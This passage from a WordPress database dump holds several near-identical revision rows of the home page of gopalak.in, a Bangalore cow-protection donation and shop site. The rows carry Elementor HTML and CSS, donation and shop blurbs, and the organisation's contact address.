10:51:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:21:39','2022-10-20 10:51:39','',1373,'https://gopalak.in/?p=1923',0,'revision','',0),(1924,1,'2022-10-20 16:26:46','2022-10-20 10:56:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:26:46','2022-10-20 10:56:46','',1373,'https://gopalak.in/?p=1924',0,'revision','',0),(1925,1,'2022-10-20 16:26:46','2022-10-20 10:56:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 16:26:46','2022-10-20 10:56:46','',1373,'https://gopalak.in/?p=1925',0,'revision','',0),(1926,1,'2022-10-20 16:26:46','2022-10-20 10:56:46','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img 